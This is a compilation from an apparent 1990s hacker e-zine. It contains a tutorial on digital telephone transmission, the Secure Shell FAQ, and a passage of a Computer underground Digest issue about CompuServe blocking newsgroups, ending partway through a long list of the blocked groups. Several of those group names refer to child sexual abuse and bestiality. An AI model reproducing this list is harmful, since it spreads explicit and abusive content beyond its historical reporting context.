|Telephone|----|-x--x--x--|------|__|---------------|01101110|-------.
--------- | Office | | | |
|__________| |________| |
|
Toll Office |
__________ 2 ________ |
_________ | Local | __ 01101110 | | |
|Telephone|----|-x--x--x--|------|__|---------------|01101110|-------.
--------- | Office | | |
|__________| |________|
Digital Switching with Digital Transmission
> Four points of analog/digital conversion have been elimated from the
previous example.
> The digital switch will switch the digital stream directly. Therefor,
digital to analog conversion is not needed.
> The introduction of a digital toll office reduces the need for some
analog/digital conversion.
> This reduces the cost of providing additional digital transmission
facilities since no analog/digital conversion will be required at the
toll office location and this will improve the overall transmission.
------------------------------------------------------------------------------
EOF ---------------- Xenon Foundation Productions 1993 -------------------EOF
------------------------------------------------------------------------------
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #5, File #8 of 12
__
\ / |_
/ \ e n o n | o u n d a t i o n
presents:
\ /
*------ the \ /
/ \ files ------*
/ \
Fall/1993 Issue: 5
INTRODUCTION TO BASIC DIGITAL TECHNOLOGY
Written by: Erik Turbo
File: 5 of 6
5. Digital Hierarchy
5.1 Digital Hierarchy Chart
____________________________________________________________________________
| LEVEL | BIT RATE | NO. OF VOICE | FACILITY | NUMBER OF | TYPE DSX |
| | | CIRCS. EQUIV. | | DIGROUPS | |
|----------------------------------------------------------------------------|
| | 1667 Mb/sec | 24192 | FT "G" | 1008 | LCIE |
| DS5 | 564.922Mb/s | 8064 | LTS 1565 | 336 | LCIE |
| | 417 Mb/s | 6048 | FT "G" | 252 | LCIE |
| DS4 | 274.176Mb/s | 4032 | LIGHTWAVE | 168 | LCIE |
| DS3C | 89.472 Mb/s | 1344 | LIGHTWAVE | 56 | LCIE |
| DS3 | 44.736 Mb/s | 672 | T3 OR LT | 28 |DSX-3/LCIE|
| DS2 | 6.312 Mb/s | 96 | T2 | 4 | DSX-2 |
| DS1C | 3.152 Mb/s | 48 | T1C | 2 | DSX-1C |
| DS1 | 1.544 Mb/s | 24 | T1 | 1 | DSX-1 |
| DS0 | 64 Kb/s | 1 | -- | -- | |
|____________________________________________________________________________|
| SUB RATES - DATA ONLY |
|____________________________________________________________________________|
| | 56 Kb/s | | | | |
| | 9.6 Kb/s | | | | |
| | 4.8 Kb/s | | | | |
| | 2.4 Kb/s | | | | |
|____________________________________________________________________________|
LCIE = Lightguide Interconnect Equipment
> The baisc unit of the hierarchy is the DS1 signal - which is a 24 channel,
TDM, 1.544 Mb/s signal.
> The number of voice channels carried of the other digital signal levsls are
direct multiples of the basic DS1 signal.
------------------------------------------------------------------------------
EOF ---------------- Xenon Foundation Productions 1993 -------------------EOF
------------------------------------------------------------------------------
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #5, File #9 of 12
__
\ / |_
/ \ e n o n | o u n d a t i o n
presents:
\ /
*------ the \ /
/ \ files ------*
/ \
Fall/1993 Issue: 6
INTRODUCTION TO BASIC DIGITAL TECHNOLOGY
Written by: Erik Turbo
File: 6 of 6
6. Multiplexing and Fiber Optics
6.1 Space Division Multiplexing (SDM)
Space Division Multiplexing is the bunding of many physically seperate trans-
mission paths into a common path. The channels are to be seperated in space.
6.2 Frequency Division Multiplexing (FDM)
Frequency Division Multiplexing is the combination of many individual
channels on a common facility. Each individual channel is placed on a
common facility at a different "carrier frequency." The individual
channels are said to be separated in frequency.
6.3 Digital Facility with Multiplexers
______ ___ ___ ______
<--->| | | | | | | |<--->
<--->| CHAN |--->| | | |--->| CHAN |<--->
<--->| | | | | | | |<--->
| | | M | | M | | |
<--->| BANK |<---| U | _________________ | U |<---| BANK |<--->
<--->| | | X | | | | X | | |<--->
<--->|______| | | | DIGITAL | | | |______|<--->
| / |--->| TRANSMISSION |--->| / |
| |<---| SYSTEM |<---| | ______
______ | D | | | | D | | |<--->
<--->| | | E | | | | E | | CHAN |<--->
<--->| CHAN |--->| M | |_________________| | M |--->| |<--->
<--->| | | U | | U | | |
| | | X | | X | | |
<--->| BANK |<---| | | |<---| BANK |<--->
<--->| | | | | | | |<--->
<--->|______| |___| |___| |______|<--->
---> high speed ---> low speed
<--- low speed <--- high speed
The function of a Multiplexer is to combine two or more lower rate bit streams
into one high rate bit stream. At the other end of teh transmission system a
Demultiplexer is needed to seperate the single high rate bit stream into
two or more lower rate bit streams.
Generally, multiplexers, or Muldems, are required whenever the digital
transmission system operates at a rate other than DS1.
6.7 Fiber Optic Systems
___________ ______________ _____________
|Electrical | | | | |
Input | to | | Transmission | | Optical to | Output
-------> | Optical |---| Medium |---| Electrical |---------->
| Transducer| | | | Transducer |
|___________| |______________| |_____________|
Basic Fiber Optic System
Components
A basic fiber optic system consists of an optical transmitter, a fiber optic
channel, and an optical receiver. The input is usually DS1, DS1C, DS2, or
DS3 electrical signals multiplexed in the optical transmission system.
A transducer converts the electrical pulses into light pulses. The light
sources include LASER, Light Amplification by Stimulated Emission of
Radiation, and LEDS, Light Emitting Diodes. Most systems generate a
signel frequency of light operating upwards in the 1500 nanometers range.
The light source is turned on and off at a fixed pulse rate. The order
of the "on" and "off" signals follow the bit pattern of the incoming
electrical signals.
The optical fiber are pure glass which provide a low loss transmission path
for the lightwave signals.
The optical fiber are pure glass which provide a low loss transmission path
for the lightwave signals.
Fiber systems used bny Telephone Companies are produced by NEC, Rockwell,
AT&T, and Northern Telecom.
6.5 Fiber
Typical Fibers
The fiber consists of a core, cladding, and protective coating.
> The core is made from germanium-doped silica glass and provides the medium
for the digital optical signal.
> The cladding which surrounds the core is also made of silica glass, but has
different transmission characteristics that bend (refracts) the signal to
stay within the core.
Advantages of Lightguide
1. The large bandwidth allows much higher channel carrying capacities.
2. Less attenuation allows longer distances between regenerators, ranging
from 35 to 50 miles.
3. The small size eases installation and allows mutliple use of conduit by
using innerduct.
------------------------------------------------------------------------------
EOF ---------------- Xenon Foundation Productions 1993 -------------------EOF
------------------------------------------------------------------------------
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #5, File #10 of 12
Secure Shell FAQ
Thomas Koenig
Newsgroups: comp.security.unix,comp.security.misc
Subject: SSH (Secure Shell) FAQ - Frequently Asked Questions
Archive-name: computer-security/ssh-faq
Url: http://www.uni-karlsruhe.de/~ig25/ssh-faq/
Posting-frequency: every 14 days
-----BEGIN PGP SIGNED MESSAGE-----
Ssh (Secure Shell) FAQ - Frequently asked questions
by Thomas Koenig, Thomas.Koenig@ciw.uni-karlsruhe.de
$Id: ssh-faq.sgml,v 1.16 1995/12/07 10:54:21 ig25 Exp $
This document is a list of Frequently Asked Questions (plus hopefully
correct answers) about the Secure Shell, ssh.
1. Meta-questions
1.1. Where do I get this document?
1.2. Where do I send questions, corrections etc. about this document?
2. Ssh basics
2.1. What is ssh?
2.2. Why should I use it?
2.3. What kinds of attacks does ssh protect against?
2.4. What kind of attacks does ssh not protect against?
2.5. How does it work?
3. Obtaining and installing ssh
3.1. What is the latest version of ssh?
3.2. What systems does ssh run on?
3.3. May I legally run ssh?
3.4. Where can I obtain ssh?
3.5. How do I install it?
3.6. Where do I get help?
3.7. Are there any versions for other operating systems than UNIX?
4. Ssh Applications
4.1. Can I run backups over ssh?
4.2. Should I turn encryption off, for performance reasons?
4.3. Can I use ssh to communicate across a firewall?
4.4. Can I distribute files with ssh, as with rdist?
4.5. Can I use ssh to securely connect two subnets across the
Internet?
4.6. Can I use ssh to securely forward UDP-based services, such as NFS
or NIS?
4.7. Can I forward SGI OpenGL connections over ssh?
5. Problems
5.1. ssh otherhost xclient & does not work!
5.2. Ssh fails with "Resource temporarily unavailable" for Solaris 2.4
5.3. X11 forwarding does not work for an SCO binary with the iBCS2
emulator under Linux.
5.4. Ssh is doing wrong things for multi-homed hosts!
5.5. Userid swapping is broken under AIX!
5.6. ssh-keygen dumps core on Alpha OSF!
5.7. ssh-keygen dumps core on Solaris or SunOS
5.8. On Linux, compilation aborts with some error message about
libc.so.4
5.9. X authorization fails for HP-UX 9.05
6. Miscellaneous
6.1. Credits
1. Meta-questions
1.1. Where do I get this document?
The latest version of this document is available from http://www.uni-
karlsruhe.de/~ig25/ssh-faq/. It will also be posted, on a regular
basis, to the Usenet newsgroups comp.security.misc,
comp.security.unix, comp.answers and news.answers.
The original SGML file is at http://www.uni-karlsruhe.de/~ig25/ssh-
faq/ssh-faq.sgml.
Also of interest is the ssh home page, at http://www.cs.hut.fi/ssh/.
1.2. Where do I send questions, corrections etc. about this document?
Please send them to the maintainer, Thomas.Koenig@ciw.uni-karlsruhe.de
2. Ssh basics
2.1. What is ssh?
To quote the README file:
Ssh (Secure Shell) is a program to log into another computer over a
network, to execute commands in a remote machine, and to move files
from one machine to another. It provides strong authentication and
secure communications over insecure channels. It is intended as a
replacement for rlogin, rsh, and rcp.
2.2. Why should I use it?
The traditional BSD 'r' - commmands (rsh, rlogin, rcp) are vulnerable
to different kinds of attacks. Somebody who has root access to
machines on the network, or physical access to the wire, can gain
unauthorized access to systems in a variety of ways. It is also
possible for such a person to log all the traffic to and from your
system, including passwords (which ssh never sends in the clear).
The X window system also has a number of severe vulnerabilities. With
ssh, you can create secure remote X sessions which are transparent to
the user. As a side effect, using remote X clients with ssh is more
convenient for users.
Users can continue to use old .rhosts and /etc/hosts.equiv files;
changing over to ssh is mostly transparent for them. If a remote site
does not support ssh, a fallback mechanism to rsh is included.
2.3. What kinds of attacks does ssh protect against?
Ssh protects against:
o IP spoofing, where a remote host sends out packets which pretend to
come from another, trusted host. Ssh even protects against a
spoofer on the local network, who can pretend he is your router to
the outside.
o IP source routing, where a host can pretend that an IP packet comes
from another, trusted host.
o DNS spoofing, where an attacker forges name server records
o Interception of cleartext passwords and other data by intermediate
hosts.
o Manipulation of data by people in control of intermediate hosts
o Attacks based on listening to X authentication data and spoofed
connection to the X11 server.
In other words, ssh never trusts the net; somebody hostile who has
taken over the network can only force ssh to disconnect, but cannot
decrypted or play back the traffic, or hijack the connection.
The above only holds if you actually use encryption. Ssh does have an
option to use encryption of type "none" this is only for debugging
purposes, and should not be used.
2.4. What kind of attacks does ssh not protect against?
Ssh will not help you with anything that compromises your host's
security in some other way. Once an attacker has gained root access to
a machine, he can then subvert ssh, too.
If somebody malevolent has access to your home directory, then
security is nonexistent. This is very much the case if your home
directory is exported via NFS.
2.5. How does it work?
For more extensive information, please refer to the README and RFC
files in the ssh directory. The proposed RFC is also available as an
Internet Draft, as draft-ylonen-ssh-protocol-00.txt.
All communications are encrypted using IDEA or one of several other
ciphers (three-key triple-DES, DES, RC4-128, TSS). Encryption keys are
exchanged using RSA, and data used in the key exchange is destroyed
every hour (keys are not saved anywhere). Every host has an RSA key
which is used to authenticate the host. Encryption is used to protect
against IP-spoofing; public key authentication is used to protect
against DNS and routing spoofing.
The RSA keys are also used to authenticate hosts.
3. Obtaining and installing ssh
3.1. What is the latest version of ssh?
The latest officially released version is 1.2.0. The latest
development version is 1.2.12.
3.2. What systems does ssh run on?
Ssh currently runs on UNIX or related system. Ports have been
successful to all "mainstream" systems.
At present, there are no known working versions for other operating
systems (but see below).
3.3. May I legally run ssh?
Ssh is free software, and can be freely used by anyone for any
purpose.
However, in some countries, particularly France, Russia, Iraq, and
Pakistan, it may be illegal to use any encryption at all without a
special permit.
If you are in the United States, you should be aware that, while ssh
was written outside the United States using information publicly
available everywhere, the US Government may consider it a criminal
offence to export this software from the US once it has been imported,
including putting it on a ftp site. Contact the Office of Defence
Trade Controls if you need more information.
The algorithms RSA and IDEA, which are used by ssh, are claimed as
patented in different countries, including the US. Linking against the
RSAREF2 library, which is possible, may or may not make it legal to
use ssh for non-commercial purposes in the US. You may need to obtain
licenses for commercial use of IDEA; ssh can be configured to work
without it. Ssh works perfectly fine without IDEA, however.
For more detail, refer to the file COPYING in the ssh source
distribution.
For information on software patents in general, see the Leauge for
Programming Freedom's homepage at http://lpf.org/.
3.4. Where can I obtain ssh?
The central site for distributing ssh is ftp://ftp.cs.hut.fi/pub/ssh/.
Official releases are PGP-signed, with the key ID
DCB9AE01 1995/04/24 Ssh distribution key <ylo@cs.hut.fi>
Key fingerprint =3D C8 90 C8 5A 08 F0 F5 FD 61 AF E6 FF CF D4 29 D9
The latest development version is available from
ftp://ftp.cs.hut.fi/pub/ssh/snapshots/.
Ssh is also available via anonymous ftp from the following sites:
Australia:
ftp://coombs.anu.edu.au/pub/security/tools
Finland:
ftp://ftp.funet.fi/pub/unix/security/login/ssh
Germany:
ftp://ftp.cert.dfn.de/pub/tools/net/ssh
Hungary:
ftp://ftp.kfki.hu/pub/packages/security/ssh
Ireland:
ftp://odyssey.ucc.ie/pub/ssh
Poland:
ftp://ftp.agh.edu.pl/pub/security/ssh
Portugal:
ftp://ftp.ci.uminho.pt/pub/security/ssh
Russia:
ftp://ftp.kiae.su/unix/crypto
Slovenia:
ftp://ftp.arnes.si/security/ssh
United Kingdom:
ftp://ftp.exweb.com/pub/security/ssh
United States:
ftp://ftp.net.ohio-state.edu/pub/security/ssh
United States:
ftp://ftp.gw.com/pub/unix/ssh
Some mirrors may not have the most recent snapshots available.
3.5. How do I install it?
Get the file from a site near you, then unpack it with
gzip -c -d ssh-1.2.12.tar.gz | tar xvf -
then change into the directory ssh-1.2.12, read the file INSTALL, and
follow the directions.
3.6. Where do I get help?
First of all, read the documentation, this document :-) and the ssh
home page, at http://www.cs.hut.fi/ssh/.
If this doesn't help, you can send mail to the mailing list for ssh
users at ssh@clinet.fi. To subscribe, send mail to
majordomo@clinet.fi with the message
subscribe ssh
in the body of the message.
Before subscribing, you might like to take a look at the archives of
the mailing list, at http://www.cs.hut.fi/ssh/ssh-archive.
3.7. Are there any versions for other operating systems than UNIX?
Heikki Suonsivu (hsu@clinet.fi) and Michael Henits (moi@dio.com) each
offered a US$ 100 reward for the first stable, freely redistributable
version for either Windows or MacOS.
There is a preliminary version for Windows by Cedomir.Igaly@srce.hr,
available from http://public.srce.hr/~cigaly/ssh/; you might want to
test this.
Bernt.Budde@udac.uu.se is working on a Mac port.
A port to VMS, by Mark Martinec (Mark.Martinec@nsc.ijs.si), is being
worked on.
4. Ssh Applications
4.1. Can I run backups over ssh?
Yes. Since ssh is a drop-in replacement for rsh, backup scripts should
continue to work. If you use rdist, see below.
4.2. Should I turn encryption off, for performance reasons?
No; you should keep it turned on, for security reasons.
Today's CPUs are fast enough that performance losses (if any) only are
noticable for local Ethernet speeds, or faster.
You might want to specify RC4 encryption instead of the default, IDEA,
with -c rc4. At an actual measurement, this dropped sustainable
transfer speed between a P90 and a 486/100 (not the fastest CPUs
around) from 386 kb/s (for no encryption) to 318 kb/s.
Across a heavily loaded Ethernet, rc4 encryption together with
compression may actually be faster than using rcp.
If you don't encrypt your sessions, you are vulnerable to all the
attacks which are open on the "r" suite of utilities, and you might as
well not use ssh.
4.3. Can I use ssh to communicate across a firewall?
Yes; you can use TCP forwarding for that, by using its secure TCP
forwarding features.
4.4. Can I distribute files with ssh, as with rdist?
Stock rdist 6.1.0 does not work together with ssh, due to bugs in it.
You can use the Linux version of rdist (which should compile on any
system for which rdist also works), available from
ftp://sunsite.unc.edu/pub/Linux/system/Network/file-transfer/ as
rdist-6.1.0-linuxpl2.tar.gz.
4.5. Can I use ssh to securely connect two subnets across the Inter-
net?
This has been discussed on the ssh mailing list. A proposed solution
was to run ppp with TCP forwarding; however, this has not been
implemented yet.
4.6. Can I use ssh to securely forward UDP-based services, such as
NFS or NIS?
Forwarding UDP packets has been proposed, but has not been
implemented. There are two problems with this:
o Some UDP-based programs use the IP address of the incoming packet
and the port it was sent from as a form of authorization.
Forwarding such packets from local ports would tend to confuse
these (badly written :-) programs.
o UDP-based programs usually use a retransmit strategy if they do not
receive an answer for a predetermined time. This leads to
ineffiency if packets are forwarded across a reliable connection,
such as TCP. Somebody would have to implement lossy UDP forwarding
to avoid this.
4.7. Can I forward SGI OpenGL connections over ssh?
It is not likely that this will be implemented. OpenGL uses a totally
different protocol from X, and at least gld would have to be replaced.
5. Problems
If you don't find your problem listed below, please submit a bug
report to ssh-bugs@clinet.fi, giving full details of
o Version number of ssh and (if different) sshd
o What you expected ssh to do
o What ssh did instead (including all error messages)
o The system you use (for example, the output of uname -a), and the
output of config.guess.
o The compiler you used, plus any compilation flags
o The output of ssh -v
o The output of the sshd daemon when run in debug mode, as sshd -d
5.1. ssh otherhost xclient & does not work!
No, it doesn't. Use "ssh -f otherhost xclient" instead, or "ssh -n
otherhost xclient &" if you want a script to be compatible with rsh.
5.2. Ssh fails with "Resource temporarily unavailable" for Solaris
2.4
This is a kernel bug in Solaris. Get the patch 101945-32.
5.3. X11 forwarding does not work for an SCO binary with the iBCS2
emulator under Linux.
You need to set the hostname to the fully qualified domain name for
this to work. Some Linux distributions set the hostname to the first
part of the FQDN only.
5.4. Ssh is doing wrong things for multi-homed hosts!
Check whether gethostbyname() really returns the complete lists of
possible IP addresses (you might, for example, have your system
configured to search /etc/hosts first, which might contain only one of
the IP addresses).
5.5. Userid swapping is broken under AIX!
This is a bug in AIX 3.2.5, reported as APAR IX38941, and fixed by
patches U435001, U427862, U426915, and a few others. Contact your IBM
representative for details.
5.6. ssh-keygen dumps core on Alpha OSF!
For Alpha OSF/1 1.3.2, this is due to a bug in the vendor-supplied
compiler with maximum optimization.
Turn off all optimization for ssh-keygen, or use gcc.
5.7. ssh-keygen dumps core on Solaris or SunOS
This is a bug in gcc 2.7.0, which causes it to generated incorrect
code without optimization. Supply the "-O" or "-O -g" options to gcc
when compiling. Alternatively, upgrade to gcc 2.7.2.
5.8. On Linux, compilation aborts with some error message about
libc.so.4
This is an incorrectly configured Linux system; do a "cd /usr/lib; ln
-s libc.sa libg.sa" as root to remedy this.
5.9. X authorization fails for HP-UX 9.05
This one is known, but a fix is not available yet. If you can supply
any additional data, please send it to ssh-bugs@clinet.fi.
The symptoms, as known so far, are:
When the target machine is running HP-UX 9.05, it is most likely that
X authorization fails if the xauth list produces some lines of output
like "this_host:1 this_host:2 this_host:4", with gaps in the
lettering. X authorization keeps failing until a local display number
is higher than the highest already present number. Removing all xauth
data does not seem to help.
6. Miscellaneous
6.1. Credits
Most of the credit, of course, goes to Tatu Ylonen for writing ssh and
making it available to the public. I have also used parts of his text
from the documentation accompanying the ssh source distribution.
Thanks also for his corrections for this FAQ.
Also of invaluable help were corrections and additions from members of
the ssh mailing list, by Mark Martinec, Pedro Melo, Michael Soukas,
Adrian Colley, and Kenneth J. Hendrickson.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
iQCVAwUBMMbl5/Bu+cbJcKCVAQHGegQAmwrCuVd44aVYiQZE9/R5NEMOwOZmPVsJ
KVHMsF49tPcA70zl1+KkZji00LtSFQTi9Lw5ts8xMqEmrWtkA9YAVFM7i6FqKApr
yzvFUljNvH7yJFa152f0TXO78fA/yd5EFrNSjDY6gsmf6Nitg488p5fZGyH+X/3U
wbzx2fswdoc=3D
=3DszVP
-----END PGP SIGNATURE-----
--
Thomas K=F6nig, Thomas.Koenig@ciw.uni-karlsruhe.de, ig25@dkauni2.bitnet.
The joy of engineering is to find a straight line on a double
logarithmic diagram.
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #5, File #11 of 12
Computer underground Digest Wed Jan 3, 1996 Volume 7 : Issue 01
ISSN 1004-042X
Editors: Jim Thomas and Gordon Meyer (TK0JUT2@MVS.CSO.NIU.EDU
Archivist: Brendan Kehoe
Shadow Master: Stanton McCandlish
Field Agent Extraordinaire: David Smith
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
CONTENTS, #8.01 (Wed, Jan 3, 1996)
File 1--REMINDER - CuD is Changing Servers - RESUBS ARE NECESSARY
File 2-- The CI$ press release
File 3-- List of CIS banned newsgroups
File 4--Compuserve: Adam Dershowitz on Censorship
File 5--Compuserve: Brad Templeton on ClariNet censorship
File 6--WP: Germany Pulls the Shade On CompuServe, Internet
File 7--Fwd: ALERT: Password Security
File 8--Reuters: Telecom Bill Nixed Until Budget Fixed
File 9--(fwd) Postcard to Briberspace (fwd)
File 10--Cu Digest Header Info (unchanged since 16 Dec, 1995)
CuD ADMINISTRATIVE, EDITORIAL, AND SUBSCRIPTION INFORMATION APPEARS IN
THE CONCLUDING FILE AT THE END OF EACH ISSUE.
---------------------------------------------------------------------
Date: Sun, 16 Dec, 1995 16:19:32 CST
From: CuD Moderators <tk0jut2@mvs.cso.niu.edu>
Subject: File 1--REMINDER - CuD is Changing Servers - RESUBS ARE NECESSARY
*** CuD IS CHANGING SERVERS *** RE-SUB NOW
In about mid-January, Cu Digest will be moving to a new server
at weber.ucsd.edu. We're following the strong consensus of
readers and requiring that, to continue to receive CuD after
mid-January, you must RE-SUBSCRIBE.
Although the move will not take place for a few weeks, you can enter
your subscribtion before then, so WE STRONGLY URGE YOU TO SUB NOW.
Re-subbing is easy. Just send a message with this in the
"Subject:" line
SUBSCRIBE CU-DIGEST
send it to:
cu-digest-request@weber.ucsd.edu
Issues will still be sent out from the older server for a few weeks,
so the strategy is to collect the resubs first, and then make the
transition.
If you prefer to access CuD from Usenet, use
comp.society.cu-digest
If you prefer archives, you can use the ftp/www site at
ftp.eff.org (or www.eff.org) or the CuD archives at:
http://www.soci.niu.edu/~cudigest.
We also hope to have a mail archive set up soon as well.
You can still contact the moderators at:
cudigest@sun.soci.niu.edu
or tk0jut2@mvs.cso.niu.edu
Please *DO NOT* send inquiries to the server at UIUC.
Jim and Gordon
------------------------------
Date: Sat, 30 Dec 1995 09:58:30 -0600
From: Stephen Smith <libertas@COMP.UARK.EDU>
Subject: File 2-- The CI$ press release
FOR IMMEDIATE RELEASE
CONTACT: William Giles Russ Robinson
CompuServe Incorporated CompuServe Incorporated
614/ 538-4388 614/ 538-4274
COMPUSERVE(R) SUSPENDS ACCESS TO SPECIFIC INTERNET NEWSGROUPS
COLUMBUS, Ohio, Dec. 28, 1995 -- During the past week, CompuServe
Incorporated temporarily suspended access to more than 200 Internet
newsgroups in response to a direct mandate from the prosecutor s office in
Germany. Each of the newsgroups that was suspended was specifically
identified to CompuServe by the German authorities as illegal under German
criminal law. CompuServe did not select any groups or determine the
nature of the newsgroups that have been impacted by this action.
German government officials, as part of an investigation of
illegal material on the Internet, ordered CompuServe to do what was
necessary with respect to specified newsgroups in order to comply with
German law. German authorities are investigating newsgroups and other
Internet content that may contain child pornography, other pornographic
material illegal for adults, as well as content that although not illegal
for adults is of such an explicit nature that it is illegal for minors.
While access has been suspended, CompuServe continues to work with
German authorities to resolve this matter. CompuServe cannot alter the
content on the Internet in any way and has only suspended access to the
disputed newsgroups through CIS. The issues being investigated in
Germany, like those being addressed across the industry, need to remain
focused on the individuals and groups placing content on the Internet.
CompuServe, as an access provider, is not responsible for the origination
or nature of content on the Internet over which it has no creative or
editorial control.
The global market is vital to CompuServe. We currently have
500,000 members in Western Europe and anticipate doubling that number in
the next year. As the leading global service, CompuServe must comply with
the laws of the many countries in which we operate. However, laws in
different countries are often in conflict, and this creates new challenges
unique to the emerging online industry. CompuServe is investigating ways
in which we can restrict user access to selected newsgroups by
geographical location.
------------------------------
Date: Sat, 30 Dec 1995 10:04:16 -0600
From: Stephen Smith <libertas@COMP.UARK.EDU>
Subject: File 3-- List of CIS banned newsgroups
I must admit that I am not familiar with _all_ of these newsgroups, but
this is reported to be an accurate list of the groups blocked by
CompuServe at the request of the Bavarian prosecutors.
---------- Forwarded message ----------
alt.binaries.pictures.erotica.teen
alt.binaries.erotic.senior-citizens
alt.binaries.multimedia.erotica
alt.binaries.pictures.black.erotic.females
alt.binaries.pictures.erotic.anime
alt.binaries.pictures.erotic.centerfolds
alt.binaries.pictures.erotic.senior-citizens
alt.binaries.pictures.erotica
alt.binaries.pictures.erotica.amateur.d
alt.binaries.pictures.erotica.amateur.female
alt.binaries.pictures.erotica.amateur.male
alt.binaries.pictures.erotica.animals
alt.binaries.pictures.erotica.anime
alt.binaries.pictures.erotica.art.pin-up
alt.binaries.pictures.erotica.balls
alt.binaries.pictures.erotica.bears
alt.binaries.pictures.erotica.bestiality
alt.binaries.pictures.erotica.black.females
alt.binaries.pictures.erotica.black.male
alt.binaries.pictures.erotica.blondes
alt.binaries.pictures.erotica.bondage
alt.binaries.pictures.erotica.breasts
alt.binaries.pictures.erotica.butts
alt.binaries.pictures.erotica.cartoons
alt.binaries.pictures.erotica.cheerleaders
alt.binaries.pictures.erotica.d
alt.binaries.pictures.erotica.disney
alt.binaries.pictures.erotica.female
alt.binaries.pictures.erotica.female.anal
alt.binaries.pictures.erotica.fetish
alt.binaries.pictures.erotica.fetish.feet
alt.binaries.pictures.erotica.fetish.hair
alt.binaries.pictures.erotica.fetish.latex
alt.binaries.pictures.erotica.fetish.leather
alt.binaries.pictures.erotica.furry
alt.binaries.pictures.erotica.gaymen
alt.binaries.pictures.erotica.latina
alt.binaries.pictures.erotica.male
alt.binaries.pictures.erotica.male.anal
alt.binaries.pictures.erotica.midgets
alt.binaries.pictures.erotica.oral
alt.binaries.pictures.erotica.orientals
alt.binaries.pictures.erotica.plushies
alt.binaries.pictures.erotica.pornstar
alt.binaries.pictures.erotica.pornstars
alt.binaries.pictures.erotica.pre-teen
alt.binaries.pictures.erotica.pregnant
alt.binaries.pictures.erotica.redheads
alt.binaries.pictures.erotica.spanking
alt.binaries.pictures.erotica.tasteless
alt.binaries.pictures.erotica.teen
alt.binaries.pictures.erotica.teen.d
alt.binaries.pictures.erotica.teen.female
alt.binaries.pictures.erotica.teen.fuckTeens
alt.binaries.pictures.erotica.teen.maleTeens
alt.binaries.pictures.erotica.terry.agar
alt.binaries.pictures.erotica.transvestites
alt.binaries.pictures.erotica.uncut
alt.binaries.pictures.erotica.urine
alt.binaries.pictures.erotica.voyeurism
alt.binaries.pictures.erotica.young
alt.binaries.pictures.groupsex
alt.binaries.pictures.lesbians
alt.binaries.pictures.lolita.misc
alt.binaries.pictures.nude.celebrities
alt.binaries.sounds.erotica
alt.homosexual
alt.magick.sex
alt.magick.sex.angst
alt.motss.bisexua-l
alt.politics.sex
alt.recovery.addiction.sexual
alt.recovery.sexual-addiction
alt.religion.sexuality
alt.sex
alt.sex.aliens
alt.sex.anal
alt.sex.animals
alt.sex.asphyx
alt.sex.balls
alt.sex.bears
alt.sex.bestiality
alt.sex.bestiality.barney
alt.sex.bestiality.hamster.duct-tape
alt.sex.bondage
alt.sex.bondage.furtoonia
alt.sex.bondage.sco.unix
alt.sex.boredom
alt.sex.boys
alt.sex.breast
alt.sex.brothels
alt.sex.carasso
alt.sex.children
alt.sex.cthulhu
alt.sex.disney
alt.sex.doom.with-sound
alt.sex.dylan
alt.sex.enemas
alt.sex.erotica.market.place
alt.sex.erotica.marketplace
alt.sex.escorts.ads
alt.sex.escorts.ads.d
alt.sex.exhibitionism
alt.sex.extropians
alt.sex.fat
alt.sex.femdom
alt.sex.fencing
alt.sex.fetish.amputee
alt.sex.fetish.diapers
alt.sex.fetish.drew-barrymore
alt.sex.fetish.fa
alt.sex.fetish.fashion
alt.sex.fetish.feet
alt.sex.fetish.hair
alt.sex.fetish.jello
alt.sex.fetish.motorcycles
alt.sex.fetish.orientals
alt.sex.fetish.peterds.momma
alt.sex.fetish.power-rangers.kimberly.tight-spandex
alt.sex.fetish.robots
alt.sex.fetish.scat
alt.sex.fetish.size
alt.sex.fetish.smoking
alt.sex.fetish.sportswear
alt.sex.fetish.startrek
alt.sex.fetish.the-bob
alt.sex.fetish.tickling
alt.sex.fetish.tinygirls
alt.sex.fetish.trent-reznor
alt.sex.fetish.waifs
alt.sex.fetish.watersports
alt.sex.fetish.wet-and-messy
alt.sex.fetish.white-mommas
alt.sex.fetish.wrestling
alt.sex.first-time
alt.sex.fish
alt.sex.furry
alt.sex.gangbang
alt.sex.girl.watchers
alt.sex.girls
alt.sex.guns
alt.sex.hello-kitty
alt.sex.historical
alt.sex.homosexual
alt.sex.incest
alt.sex.intergen
alt.sex.jesus
alt.sex.jp
alt.sex.magazines
alt.sex.marsha-clark
alt.sex.masturbation
alt.sex.midgets
alt.sex.modem-kamikaze
alt.sex.motss
alt.sex.movies
alt.sex.necrophilia
alt.sex.nudels.me.too
alt.sex.oral
alt.sex.orgy
alt.sex.pedophilia
alt.sex.pedophilia.boys
alt.sex.pedophilia.girls
alt.sex.pedophilia.pictures
alt.sex.pedophilia.swaps
alt.sex.pictures
alt.sex.pictures.d
alt.sex.pictures.female
alt.sex.pictures.male
alt.sex.plushies
alt.sex.pre-teens
alt.sex.prostitution
alt.sex.reptiles
alt.sex.safe
alt.sex.services
alt.sex.sgml
alt.sex.sm.fig
alt.sex.snakes
alt.sex.sounds
alt.sex.spanking
alt.sex.stories
alt.sex.stories.d
alt.sex.stories.gay
alt.sex.stories.hetero
alt.sex.stories.moderated
alt.sex.stories.tg
alt.sex.strip-clubs
alt.sex.super-size
alt.sex.swingers
alt.sex.tasteless
alt.sex.telephone
alt.sex.toons
alt.sex.trans
alt.sex.ugly
alt.sex.uncut
alt.sex.video-swap
alt.sex.voxmeet
alt.sex.voyeurism
alt.sex.wanted
alt.sex.wanted.escorts.ads
alt.sex.watersports
alt.sex.weight-gain
alt.sex.wizards
alt.sex.young
alt.sex.zoophile
alt.sexy.bald.captains
alt.stories.erotic
alt.support.disabled.sexuality
alt.tv.tiny-toon.sex
clari.news.crime.sex
clari.news.gays
clari.news.sex
aus.sex
de.talk.sex
es.alt.sexo
fido.ger.sex
fido.sex-ger
fido7.ru-sex
fido7.ru-sex.adv
fido7.russian-sex
finet.sex
fiod7.other.russian.sex
fiod7.ru.sex
gay-net.behinderte
gay-net.btx-ecke
gay-net.coming-out
gay-net.dfue
gay-net.erotic-stories
gay-net.gruppen.general
gay-net.guide.bundesweit
gay-net.guide.weltweit
gay-net.haushalt
gay-net.international
